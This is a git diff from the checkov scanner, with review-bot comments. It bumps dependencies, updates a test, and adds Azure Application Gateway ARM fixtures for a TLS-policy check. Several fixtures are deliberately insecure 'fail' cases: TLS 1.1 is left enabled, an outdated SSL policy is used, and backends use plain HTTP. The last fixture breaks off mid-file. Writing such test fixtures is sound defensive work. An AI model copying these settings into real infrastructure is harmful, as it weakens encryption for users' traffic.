+ echo "checkov $RESOURCE_TO_SCAN $CHECK_FLAG $SKIP_CHECK_FLAG $COMPACT_FLAG $QUIET_FLAG $SOFT_FAIL_FLAG $USE_ENFORCEMENT_RULES_FLAG $SKIP_RESULTS_UPLOAD_FLAG $SKIP_DOWNLOAD_FLAG $ENABLE_SECRETS_SCAN_ALL_FILES $EXTCHECK_DIRS_FLAG $EXTCHECK_REPOS_FLAG $OUTPUT_FLAG $OUTPUT_FILE_PATH_FLAG $OUTPUT_BC_IDS_FLAG $DOWNLOAD_EXTERNAL_MODULES_FLAG $CONFIG_FILE_FLAG $SOFT_FAIL_ON_FLAG $HARD_FAIL_ON_FLAG $FRAMEWORK_FLAG $SKIP_FRAMEWORK_FLAG $SKIP_CVE_PACKAGE_FLAG $BASELINE_FLAG $VAR_FILE_FLAG $POLICY_METADATA_FILTER_FLAG $INPUT_REPO_ROOT_FOR_PLAN_ENRICHMENT_FLAG $INPUT_DEEP_ANALYSIS_FLAG $SKIP_PATH_FLAG"
+ CHECKOV_RESULTS=$(checkov $RESOURCE_TO_SCAN $CHECK_FLAG $SKIP_CHECK_FLAG $COMPACT_FLAG $QUIET_FLAG $SOFT_FAIL_FLAG $USE_ENFORCEMENT_RULES_FLAG $SKIP_RESULTS_UPLOAD_FLAG $SKIP_DOWNLOAD_FLAG $ENABLE_SECRETS_SCAN_ALL_FILES $EXTCHECK_DIRS_FLAG $EXTCHECK_REPOS_FLAG $OUTPUT_FLAG $OUTPUT_FILE_PATH_FLAG $OUTPUT_BC_IDS_FLAG $DOWNLOAD_EXTERNAL_MODULES_FLAG $CONFIG_FILE_FLAG $SOFT_FAIL_ON_FLAG $HARD_FAIL_ON_FLAG $FRAMEWORK_FLAG $SKIP_FRAMEWORK_FLAG $SKIP_CVE_PACKAGE_FLAG $BASELINE_FLAG $VAR_FILE_FLAG $POLICY_METADATA_FILTER_FLAG $INPUT_REPO_ROOT_FOR_PLAN_ENRICHMENT_FLAG $INPUT_DEEP_ANALYSIS_FLAG $SKIP_PATH_FLAG)
 fi
 fi
diff --git a/kubernetes/requirements.txt b/kubernetes/requirements.txt
index b4829887dac..f5af9c2b01b 100644
--- a/kubernetes/requirements.txt
+++ b/kubernetes/requirements.txt
@@ -1 +1 @@
-checkov==3.2.79
+checkov==3.2.125
diff --git a/performance_tests/test_checkov_performance.py b/performance_tests/test_checkov_performance.py
index fd2aef36210..12d7b4cfbe7 100644
--- a/performance_tests/test_checkov_performance.py
+++ b/performance_tests/test_checkov_performance.py
@@ -18,7 +18,7 @@
 'repo_name': 'terraform-aws-components',
 'threshold': {
 "Darwin": 19.0,
- "Linux": 8.0,
+ "Linux": 10.0,
 "Windows": 15.0,
 }
 },
diff --git a/setup.py b/setup.py
index 4a4f58e2c52..a37c67f4d71 100644
--- a/setup.py
+++ b/setup.py
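Review bot: `$INPUT_DEEP_ANALYSIS_FLAG` joins a command line of thirty-odd unquoted expansions; leaving them unquoted is what lets an empty flag vanish in this style, but it also word-splits and glob-expands any flag value that carries a space or a `*` before checkov sees it. The new flag is either empty or exactly `--deep-analysis`, so it is not itself at risk, yet every addition has to be made to four near-identical lines (this hunk touches all four for one flag) and the drift risk grows with each one. A bash array — `args+=(--deep-analysis)` next to the assignment in the earlier hunk, then `checkov "${args[@]}"` here — keeps empty flags out and quoting correct in one place. The `if [ -n "$API_KEY_VARIABLE" ]` block is whole within the hunk; the outer `else` it sits in begins before it.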
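Review bot: The Linux threshold for `terraform-aws-components` is raised from 8.0 to 10.0 with nothing on the line saying what got slower, so the next reader of this dict cannot tell an accepted cost from a papered-over regression; Darwin and Windows are untouched, which hints at a Linux-runner-specific cause rather than a checkov change, but the hunk does not say. Put the reason on the changed line, e.g. `"Linux": 10.0,  # raised from 8.0: <cause / PR link>`. The dict this sits in and the test that compares against it start and end outside the hunk.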
@@ -66,7 +66,7 @@ def run(self) -> None:
 },
 install_requires=[
 "bc-python-hcl2==0.4.2",
- "bc-detect-secrets==1.5.9",
+ "bc-detect-secrets==1.5.11",
 "bc-jsonpath-ng==1.6.1",
 "pycep-parser==0.4.1",
 "tabulate>=0.9.0,<0.10.0",
@@ -108,7 +108,8 @@ def run(self) -> None:
 "license-expression>=30.1.0,<31.0.0",
 "rustworkx>=0.13.0,<0.14.0",
 "pydantic>=2.0.0,<3.0.0",
- "botocore==1.34.25"
+ "botocore==1.34.25",
+ "urllib3>=1.26.0,<2.0.0"
 ],
 dependency_links=[], # keep it empty, needed for pipenv-setup
 license="Apache License 2.0",
@@ -142,6 +143,7 @@ def run(self) -> None:
 "checkov.terraform.checks.graph_checks": ["**/*.json"],
 "checkov.cdk.checks": [
 "python/*.yaml",
+ "typescript/*.yaml",
 ],
 },
 scripts=["bin/checkov", "bin/checkov.cmd"],
diff --git a/tests/ansible/test_graph_manager.py b/tests/ansible/test_graph_manager.py
index 037a3193570..6d3909e9d29 100644
--- a/tests/ansible/test_graph_manager.py
+++ b/tests/ansible/test_graph_manager.py
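Review bot: `"urllib3>=1.26.0,<2.0.0"` is added to `install_requires` without a comment saying why checkov now pins urllib3 directly, and the `>=1.26.0` floor still admits 1.26.x releases that predate the later 1.26 security patch releases, so a fresh install can resolve to an old urllib3 while looking constrained. If the point is to stay off urllib3 2.x for the `botocore==1.34.25` pinned on the previous line (or another consumer — confirm), raise the floor to a current 1.26 patch release and record the reason: `"urllib3>=1.26.18,<2.0.0",  # stay on 1.26.x for <consumer>; floor at a current 1.26 security release`. Any mirrored development dependency list should carry the identical constraint so the two cannot drift. The `install_requires` list begins and ends outside this hunk.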
@@ -34,15 +34,17 @@ def test_build_graph_from_definitions():
 assert task.attributes[CustomAttributes.RESOURCE_TYPE] == "tasks.amazon.aws.ec2_instance"
 assert task.attributes[START_LINE] == 11
 assert task.attributes[END_LINE] == 22
- assert task.config == {
- "name": "public-compute-instance",
- "key_name": "prod-ssh-key",
- "vpc_subnet_id": "subnet-5ca1ab1e",
- "instance_type": "c5.large",
- "security_group": "default",
- "network": {"assign_public_ip": True, "__startline__": 19, "__endline__": 20},
- "image_id": "ami-123456",
- "ebs_optimized": True,
- "__startline__": 13,
- "__endline__": 22,
- }
+ assert task.config == {'name': 'enabled',
+ 'amazon.aws.ec2_instance':
+ {'name': 'public-compute-instance',
+ 'key_name': 'prod-ssh-key',
+ 'vpc_subnet_id': 'subnet-5ca1ab1e',
+ 'instance_type': 'c5.large',
+ 'security_group': 'default',
+ 'network': {'assign_public_ip': True, '__startline__': 19, '__endline__': 20},
+ 'image_id': 'ami-123456',
+ 'ebs_optimized': True,
+ '__startline__': 13,
+ '__endline__': 22},
+ '__startline__': 11,
+ '__endline__': 22}
diff --git a/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/empty_sslPolicy_fail1.json b/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/empty_sslPolicy_fail1.json
new file mode 100644
index 00000000000..9bdb234f4fd
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/empty_sslPolicy_fail1.json
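Review bot: The replacement expectation switches to single-quoted strings and a column-aligned hanging layout, while the three context asserts above it and the lines it replaces use double quotes with one key per line at a fixed indent, so the new literal reads as pasted from an interpreter rather than written to the file's style. Reformat it with double quotes and one key per line (`black` on this file would produce that), which also keeps the next change to this dict reviewable line by line. The new shape — the module arguments nested under `'amazon.aws.ec2_instance'` with the task's own `'name': 'enabled'` and line span beside them — pins a behaviour change in the graph builder that is not visible in this chunk, so a one-line comment above the assert, `# task config is keyed by module name; task-level name and span sit beside it`, would spare the next reader a trip to the builder. `test_build_graph_from_definitions` starts outside the hunk.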
@@ -0,0 +1,226 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "addressPrefix": { + "type": "string", + "defaultValue": "10.0.0.0/16", + "metadata": { + "description": "Address prefix for the Virtual Network" + } + }, + "subnetPrefix": { + "type": "string", + "defaultValue": "10.0.0.0/28", + "metadata": { + "description": "Subnet prefix" + } + }, + "skuName": { + "type": "string", + "allowedValues": [ + "Standard_Small", + "Standard_Medium", + "Standard_Large" + ], + "defaultValue": "Standard_Medium", + "metadata": { + "description": "Sku Name" + } + }, + "capacity": { + "type": "int", + "defaultValue": 2, + "metadata": { + "description": "Number of instances" + } + }, + "backendIpAddress1": { + "type": "string", + "metadata": { + "description": "IP Address for Backend Server 1" + } + }, + "backendIpAddress2": { + "type": "string", + "metadata": { + "description": "IP Address for Backend Server 2" + } + }, + "certData": { + "type": "securestring", + "metadata": { + "description": "Base-64 encoded form of the .pfx file" + } + }, + "certPassword": { + "type": "securestring", + "metadata": { + "description": "Password for .pfx certificate" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." 
+ } + } + }, + "variables": { + "applicationGatewayName": "applicationGateway1", + "publicIPAddressName": "publicIp1", + "virtualNetworkName": "virtualNetwork1", + "subnetName": "appGatewaySubnet", + "subnetRef": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworkName'), variables('subnetName'))]", + "publicIPRef": "[resourceId('Microsoft.Network/publicIPAddresses',variables('publicIPAddressName'))]" + }, + "resources": [ + { + "apiVersion": "2021-02-01", + "type": "Microsoft.Network/publicIPAddresses", + "name": "[variables('publicIPAddressName')]", + "location": "[parameters('location')]", + "properties": { + "publicIPAllocationMethod": "Dynamic" + } + }, + { + "apiVersion": "2017-06-01", + "type": "Microsoft.Network/virtualNetworks", + "name": "defoult", + "location": "[parameters('location')]", + "properties": { + "addressSpace": { + "addressPrefixes": [ + "[parameters('addressPrefix')]" + ] + }, + "subnets": [ + { + "name": "[variables('subnetName')]", + "properties": { + "addressPrefix": "[parameters('subnetPrefix')]" + } + } + ] + } + }, + { + "apiVersion": "2017-06-01", + "name": "empty_sslPolicy_fail1", + "type": "Microsoft.Network/applicationGateways", + "location": "[parameters('location')]", + "dependsOn": [ + "[resourceId('Microsoft.Network/virtualNetworks/', variables('virtualNetworkName'))]", + "[resourceId('Microsoft.Network/publicIPAddresses/', variables('publicIPAddressName'))]" + ], + "properties": { + "sku": { + "name": "[parameters('skuName')]", + "tier": "Standard", + "capacity": "[parameters('capacity')]" + }, + "sslCertificates": [ + { + "name": "appGatewaySslCert", + "properties": { + "data": "[parameters('certData')]", + "password": "[parameters('certPassword')]" + } + } + ], + "gatewayIPConfigurations": [ + { + "name": "appGatewayIpConfig", + "properties": { + "subnet": { + "id": "[variables('subnetRef')]" + } + } + } + ], + "frontendIPConfigurations": [ + { + "name": "appGatewayFrontendIP", + "properties": 
{ + "PublicIPAddress": { + "id": "[variables('publicIPRef')]" + } + } + } + ], + "frontendPorts": [ + { + "name": "appGatewayFrontendPort", + "properties": { + "Port": 443 + } + } + ], + "backendAddressPools": [ + { + "name": "appGatewayBackendPool", + "properties": { + "BackendAddresses": [ + { + "IpAddress": "[parameters('backendIpAddress1')]" + }, + { + "IpAddress": "[parameters('backendIpAddress2')]" + } + ] + } + } + ], + "backendHttpSettingsCollection": [ + { + "name": "appGatewayBackendHttpSettings", + "properties": { + "Port": 80, + "Protocol": "Http", + "CookieBasedAffinity": "Disabled" + } + } + ], + "httpListeners": [ + { + "name": "appGatewayHttpListener", + "properties": { + "FrontendIPConfiguration": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/frontendIPConfigurations', variables('applicationGatewayName'), 'appGatewayFrontendIP')]" + }, + "FrontendPort": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/frontendPorts', variables('applicationGatewayName'), 'appGatewayFrontendPort')]" + }, + "Protocol": "Https", + "SslCertificate": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/sslCertificates', variables('applicationGatewayName'), 'appGatewaySslCert')]" + } + } + } + ], + "requestRoutingRules": [ + { + "Name": "rule1", + "properties": { + "RuleType": "Basic", + "httpListener": { + "id": "[resourceId('Microsoft.Network/applicationGateways/httpListeners', variables('applicationGatewayName'), 'appGatewayHttpListener')]" + }, + "backendAddressPool": { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools', variables('applicationGatewayName'), 'appGatewayBackendPool')]" + }, + "backendHttpSettings": { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendHttpSettingsCollection', variables('applicationGatewayName'), 'appGatewayBackendHttpSettings')]" + } + } + } + ], + "sslPolicy": { + "disabledSslProtocols": "TLSv1_0" + } + } + } + ] +} 
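Review bot: The fixture's file name and resource name say `empty_sslPolicy`, but the gateway carries a non-empty `"sslPolicy": {"disabledSslProtocols": "TLSv1_0"}`; either the name or the content should change so the case it covers (no policyType, only TLS 1.0 disabled, so TLS 1.1 stays enabled) is obvious to whoever reads the check's test list. In the ARM schema `disabledSslProtocols` is an array of strings, so `"disabledSslProtocols": ["TLSv1_0"]` is the shape the check will meet in real templates, and a fixture using the scalar form may exercise a code path real templates never hit. The virtual network resource is named `defoult` while `dependsOn` references `variables('virtualNetworkName')`, i.e. `virtualNetwork1`, so the dependency points at a resource the template does not define; the same mismatch is present in with_policyName_fail3.json, with_policyName_pass1.json, with_protocolversion_and_cipher_fail2.json and with_protocolversion_and_cipher_pass.json.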
diff --git a/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/with_policyName_fail3.json b/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/with_policyName_fail3.json new file mode 100644 index 00000000000..f30451083f4 --- /dev/null +++ b/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/with_policyName_fail3.json 
@@ -0,0 +1,227 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "addressPrefix": { + "type": "string", + "defaultValue": "10.0.0.0/16", + "metadata": { + "description": "Address prefix for the Virtual Network" + } + }, + "subnetPrefix": { + "type": "string", + "defaultValue": "10.0.0.0/28", + "metadata": { + "description": "Subnet prefix" + } + }, + "skuName": { + "type": "string", + "allowedValues": [ + "Standard_Small", + "Standard_Medium", + "Standard_Large" + ], + "defaultValue": "Standard_Medium", + "metadata": { + "description": "Sku Name" + } + }, + "capacity": { + "type": "int", + "defaultValue": 2, + "metadata": { + "description": "Number of instances" + } + }, + "backendIpAddress1": { + "type": "string", + "metadata": { + "description": "IP Address for Backend Server 1" + } + }, + "backendIpAddress2": { + "type": "string", + "metadata": { + "description": "IP Address for Backend Server 2" + } + }, + "certData": { + "type": "securestring", + "metadata": { + "description": "Base-64 encoded form of the .pfx file" + } + }, + "certPassword": { + "type": "securestring", + "metadata": { + "description": "Password for .pfx certificate" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." 
+ } + } + }, + "variables": { + "applicationGatewayName": "applicationGateway1", + "publicIPAddressName": "publicIp1", + "virtualNetworkName": "virtualNetwork", + "subnetName": "appGatewaySubnet", + "subnetRef": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworkName'), variables('subnetName'))]", + "publicIPRef": "[resourceId('Microsoft.Network/publicIPAddresses',variables('publicIPAddressName'))]" + }, + "resources": [ + { + "apiVersion": "2021-02-01", + "type": "Microsoft.Network/publicIPAddresses", + "name": "[variables('publicIPAddressName')]", + "location": "[parameters('location')]", + "properties": { + "publicIPAllocationMethod": "Dynamic" + } + }, + { + "apiVersion": "2017-06-01", + "type": "Microsoft.Network/virtualNetworks", + "name": "defoult", + "location": "[parameters('location')]", + "properties": { + "addressSpace": { + "addressPrefixes": [ + "[parameters('addressPrefix')]" + ] + }, + "subnets": [ + { + "name": "[variables('subnetName')]", + "properties": { + "addressPrefix": "[parameters('subnetPrefix')]" + } + } + ] + } + }, + { + "apiVersion": "2017-06-01", + "name": "with_policyName_fail3", + "type": "Microsoft.Network/applicationGateways", + "location": "[parameters('location')]", + "dependsOn": [ + "[resourceId('Microsoft.Network/virtualNetworks/', variables('virtualNetworkName'))]", + "[resourceId('Microsoft.Network/publicIPAddresses/', variables('publicIPAddressName'))]" + ], + "properties": { + "sku": { + "name": "[parameters('skuName')]", + "tier": "Standard", + "capacity": "[parameters('capacity')]" + }, + "sslCertificates": [ + { + "name": "appGatewaySslCert", + "properties": { + "data": "[parameters('certData')]", + "password": "[parameters('certPassword')]" + } + } + ], + "gatewayIPConfigurations": [ + { + "name": "appGatewayIpConfig", + "properties": { + "subnet": { + "id": "[variables('subnetRef')]" + } + } + } + ], + "frontendIPConfigurations": [ + { + "name": "appGatewayFrontendIP", + "properties": 
{ + "PublicIPAddress": { + "id": "[variables('publicIPRef')]" + } + } + } + ], + "frontendPorts": [ + { + "name": "appGatewayFrontendPort", + "properties": { + "Port": 443 + } + } + ], + "backendAddressPools": [ + { + "name": "appGatewayBackendPool", + "properties": { + "BackendAddresses": [ + { + "IpAddress": "[parameters('backendIpAddress1')]" + }, + { + "IpAddress": "[parameters('backendIpAddress2')]" + } + ] + } + } + ], + "backendHttpSettingsCollection": [ + { + "name": "appGatewayBackendHttpSettings", + "properties": { + "Port": 80, + "Protocol": "Http", + "CookieBasedAffinity": "Disabled" + } + } + ], + "httpListeners": [ + { + "name": "appGatewayHttpListener", + "properties": { + "FrontendIPConfiguration": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/frontendIPConfigurations', variables('applicationGatewayName'), 'appGatewayFrontendIP')]" + }, + "FrontendPort": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/frontendPorts', variables('applicationGatewayName'), 'appGatewayFrontendPort')]" + }, + "Protocol": "Https", + "SslCertificate": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/sslCertificates', variables('applicationGatewayName'), 'appGatewaySslCert')]" + } + } + } + ], + "requestRoutingRules": [ + { + "Name": "rule1", + "properties": { + "RuleType": "Basic", + "httpListener": { + "id": "[resourceId('Microsoft.Network/applicationGateways/httpListeners', variables('applicationGatewayName'), 'appGatewayHttpListener')]" + }, + "backendAddressPool": { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools', variables('applicationGatewayName'), 'appGatewayBackendPool')]" + }, + "backendHttpSettings": { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendHttpSettingsCollection', variables('applicationGatewayName'), 'appGatewayBackendHttpSettings')]" + } + } + } + ], + "sslPolicy": { + "policyType": "Predefined", + "policyName": "20150501" + } + } + } + ] +} 
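Review bot: `"policyName": "20150501"` is not a predefined Application Gateway policy name; the real identifier for that policy is `AppGwSslPolicy20150501`. As written, the fixture presumably fails because the name is unrecognized rather than because it is a known-outdated predefined policy, so the check's handling of a legitimate but weak predefined policy goes untested. Using `"policyName": "AppGwSslPolicy20150501"` would make this a meaningful counterpart to the `AppGwSslPolicy20220101S` pass fixture; if an unknown-name case is also wanted, it deserves its own file with a name that says so.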
diff --git a/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/with_policyName_pass1.json b/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/with_policyName_pass1.json new file mode 100644 index 00000000000..e7ac9fa7562 --- /dev/null +++ b/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/with_policyName_pass1.json 
@@ -0,0 +1,227 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "addressPrefix": { + "type": "string", + "defaultValue": "10.0.0.0/16", + "metadata": { + "description": "Address prefix for the Virtual Network" + } + }, + "subnetPrefix": { + "type": "string", + "defaultValue": "10.0.0.0/28", + "metadata": { + "description": "Subnet prefix" + } + }, + "skuName": { + "type": "string", + "allowedValues": [ + "Standard_Small", + "Standard_Medium", + "Standard_Large" + ], + "defaultValue": "Standard_Medium", + "metadata": { + "description": "Sku Name" + } + }, + "capacity": { + "type": "int", + "defaultValue": 2, + "metadata": { + "description": "Number of instances" + } + }, + "backendIpAddress1": { + "type": "string", + "metadata": { + "description": "IP Address for Backend Server 1" + } + }, + "backendIpAddress2": { + "type": "string", + "metadata": { + "description": "IP Address for Backend Server 2" + } + }, + "certData": { + "type": "securestring", + "metadata": { + "description": "Base-64 encoded form of the .pfx file" + } + }, + "certPassword": { + "type": "securestring", + "metadata": { + "description": "Password for .pfx certificate" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." 
+ } + } + }, + "variables": { + "applicationGatewayName": "applicationGateway1", + "publicIPAddressName": "publicIp1", + "virtualNetworkName": "virtualNetwork", + "subnetName": "appGatewaySubnet", + "subnetRef": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworkName'), variables('subnetName'))]", + "publicIPRef": "[resourceId('Microsoft.Network/publicIPAddresses',variables('publicIPAddressName'))]" + }, + "resources": [ + { + "apiVersion": "2021-02-01", + "type": "Microsoft.Network/publicIPAddresses", + "name": "[variables('publicIPAddressName')]", + "location": "[parameters('location')]", + "properties": { + "publicIPAllocationMethod": "Dynamic" + } + }, + { + "apiVersion": "2017-06-01", + "type": "Microsoft.Network/virtualNetworks", + "name": "[defoult", + "location": "[parameters('location')]", + "properties": { + "addressSpace": { + "addressPrefixes": [ + "[parameters('addressPrefix')]" + ] + }, + "subnets": [ + { + "name": "[variables('subnetName')]", + "properties": { + "addressPrefix": "[parameters('subnetPrefix')]" + } + } + ] + } + }, + { + "apiVersion": "2017-06-01", + "name": "with_policyName_pass1", + "type": "Microsoft.Network/applicationGateways", + "location": "[parameters('location')]", + "dependsOn": [ + "[resourceId('Microsoft.Network/virtualNetworks/', variables('virtualNetworkName'))]", + "[resourceId('Microsoft.Network/publicIPAddresses/', variables('publicIPAddressName'))]" + ], + "properties": { + "sku": { + "name": "[parameters('skuName')]", + "tier": "Standard", + "capacity": "[parameters('capacity')]" + }, + "sslCertificates": [ + { + "name": "appGatewaySslCert", + "properties": { + "data": "[parameters('certData')]", + "password": "[parameters('certPassword')]" + } + } + ], + "gatewayIPConfigurations": [ + { + "name": "appGatewayIpConfig", + "properties": { + "subnet": { + "id": "[variables('subnetRef')]" + } + } + } + ], + "frontendIPConfigurations": [ + { + "name": "appGatewayFrontendIP", + "properties": 
{ + "PublicIPAddress": { + "id": "[variables('publicIPRef')]" + } + } + } + ], + "frontendPorts": [ + { + "name": "appGatewayFrontendPort", + "properties": { + "Port": 443 + } + } + ], + "backendAddressPools": [ + { + "name": "appGatewayBackendPool", + "properties": { + "BackendAddresses": [ + { + "IpAddress": "[parameters('backendIpAddress1')]" + }, + { + "IpAddress": "[parameters('backendIpAddress2')]" + } + ] + } + } + ], + "backendHttpSettingsCollection": [ + { + "name": "appGatewayBackendHttpSettings", + "properties": { + "Port": 80, + "Protocol": "Http", + "CookieBasedAffinity": "Disabled" + } + } + ], + "httpListeners": [ + { + "name": "appGatewayHttpListener", + "properties": { + "FrontendIPConfiguration": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/frontendIPConfigurations', variables('applicationGatewayName'), 'appGatewayFrontendIP')]" + }, + "FrontendPort": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/frontendPorts', variables('applicationGatewayName'), 'appGatewayFrontendPort')]" + }, + "Protocol": "Https", + "SslCertificate": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/sslCertificates', variables('applicationGatewayName'), 'appGatewaySslCert')]" + } + } + } + ], + "requestRoutingRules": [ + { + "Name": "rule1", + "properties": { + "RuleType": "Basic", + "httpListener": { + "id": "[resourceId('Microsoft.Network/applicationGateways/httpListeners', variables('applicationGatewayName'), 'appGatewayHttpListener')]" + }, + "backendAddressPool": { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools', variables('applicationGatewayName'), 'appGatewayBackendPool')]" + }, + "backendHttpSettings": { + "id": "[resourceId('Microsoft.Network/applicationGateways/backendHttpSettingsCollection', variables('applicationGatewayName'), 'appGatewayBackendHttpSettings')]" + } + } + } + ], + "sslPolicy": { + "policyType": "Predefined", + "policyName": "AppGwSslPolicy20220101S" + } + } + } + ] +} 
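Review bot: The virtual network's `"name": "[defoult"` is an unterminated ARM expression (opening bracket with no closing one), unlike the plain `"defoult"` in the sibling fixtures, so an ARM-aware parser may treat it as a template expression and reject or mis-evaluate it rather than as a literal name. For a pass fixture the template should be unambiguous, so `"name": "defoult"` at minimum, or `"name": "[variables('virtualNetworkName')]"` so that `dependsOn` actually resolves to this resource.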
diff --git a/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/with_protocolversion_and_cipher_fail2.json b/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/with_protocolversion_and_cipher_fail2.json new file mode 100644 index 00000000000..f735d773f77 --- /dev/null +++ b/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/with_protocolversion_and_cipher_fail2.json 
@@ -0,0 +1,233 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "addressPrefix": { + "type": "string", + "defaultValue": "10.0.0.0/16", + "metadata": { + "description": "Address prefix for the Virtual Network" + } + }, + "subnetPrefix": { + "type": "string", + "defaultValue": "10.0.0.0/28", + "metadata": { + "description": "Subnet prefix" + } + }, + "skuName": { + "type": "string", + "allowedValues": [ + "Standard_Small", + "Standard_Medium", + "Standard_Large" + ], + "defaultValue": "Standard_Medium", + "metadata": { + "description": "Sku Name" + } + }, + "capacity": { + "type": "int", + "defaultValue": 2, + "metadata": { + "description": "Number of instances" + } + }, + "backendIpAddress1": { + "type": "string", + "metadata": { + "description": "IP Address for Backend Server 1" + } + }, + "backendIpAddress2": { + "type": "string", + "metadata": { + "description": "IP Address for Backend Server 2" + } + }, + "certData": { + "type": "securestring", + "metadata": { + "description": "Base-64 encoded form of the .pfx file" + } + }, + "certPassword": { + "type": "securestring", + "metadata": { + "description": "Password for .pfx certificate" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." 
+ } + } + }, + "variables": { + "applicationGatewayName": "applicationGateway1", + "publicIPAddressName": "publicIp1", + "virtualNetworkName": "virtualNetwork1", + "subnetName": "appGatewaySubnet", + "subnetRef": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworkName'), variables('subnetName'))]", + "publicIPRef": "[resourceId('Microsoft.Network/publicIPAddresses',variables('publicIPAddressName'))]" + }, + "resources": [ + { + "apiVersion": "2021-02-01", + "type": "Microsoft.Network/publicIPAddresses", + "name": "[variables('publicIPAddressName')]", + "location": "[parameters('location')]", + "properties": { + "publicIPAllocationMethod": "Dynamic" + } + }, + { + "apiVersion": "2018-06-01", + "type": "Microsoft.Network/virtualNetworks", + "name": "defoult", + "location": "[parameters('location')]", + "properties": { + "addressSpace": { + "addressPrefixes": [ + "[parameters('addressPrefix')]" + ] + }, + "subnets": [ + { + "name": "[variables('subnetName')]", + "properties": { + "addressPrefix": "[parameters('subnetPrefix')]" + } + } + ] + } + }, + { + "apiVersion": "2017-06-01", + "name": "with_protocolversion_and_cipher_fail2", + "type": "Microsoft.Network/applicationGateways", + "location": "[parameters('location')]", + "dependsOn": [ + "[resourceId('Microsoft.Network/virtualNetworks/', variables('virtualNetworkName'))]", + "[resourceId('Microsoft.Network/publicIPAddresses/', variables('publicIPAddressName'))]" + ], + "properties": { + "sku": { + "name": "[parameters('skuName')]", + "tier": "Standard", + "capacity": "[parameters('capacity')]" + }, + "sslCertificates": [ + { + "name": "appGatewaySslCert", + "properties": { + "data": "[parameters('certData')]", + "password": "[parameters('certPassword')]" + } + } + ], + "gatewayIPConfigurations": [ + { + "name": "appGatewayIpConfig", + "properties": { + "subnet": { + "id": "[variables('subnetRef')]" + } + } + } + ], + "frontendIPConfigurations": [ + { + "name": "appGatewayFrontendIP", 
+ "properties": { + "PublicIPAddress": { + "id": "[variables('publicIPRef')]" + } + } + } + ], + "frontendPorts": [ + { + "name": "appGatewayFrontendPort", + "properties": { + "Port": 443 + } + } + ], + "backendAddressPools": [ + { + "name": "appGatewayBackendPool", + "properties": { + "BackendAddresses": [ + { + "IpAddress": "[parameters('backendIpAddress1')]" + }, + { + "IpAddress": "[parameters('backendIpAddress2')]" + } + ] + } + } + ], + "backendHttpSettingsCollection": [ + { + "name": "appGatewayBackendHttpSettings", + "properties": { + "Port": 80, + "Protocol": "Http", + "CookieBasedAffinity": "Disabled" + } + } + ], + "httpListeners": [ + { + "name": "appGatewayHttpListener", + "properties": { + "FrontendIPConfiguration": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/frontendIPConfigurations',variables('applicationGatewayName'), 'appGatewayFrontendIP')]" + }, + "FrontendPort": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/frontendPorts',variables('applicationGatewayName'), 'appGatewayFrontendPort')]" + }, + "Protocol": "Https", + "SslCertificate": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/sslCertificates',variables('applicationGatewayName'), 'appGatewaySslCert')]" + } + } + } + ], + "requestRoutingRules": [ + { + "Name": "rule1", + "properties": { + "RuleType": "Basic", + "httpListener": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/httpListeners',variables('applicationGatewayName'), 'appGatewayHttpListener')]" + }, + "backendAddressPool": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools',variables('applicationGatewayName'), 'appGatewayBackendPool')]" + }, + "backendHttpSettings": { + "Id": "[resourceId('Microsoft.Network/applicationGateways/backendHttpSettingsCollection',variables('applicationGatewayName'), 'appGatewayBackendHttpSettings')]" + } + } + } + ], + "sslPolicy": { + "policyType": "Custom", + "minProtocolVersion": "TLSv1_2", + "cipherSuites": [ + 
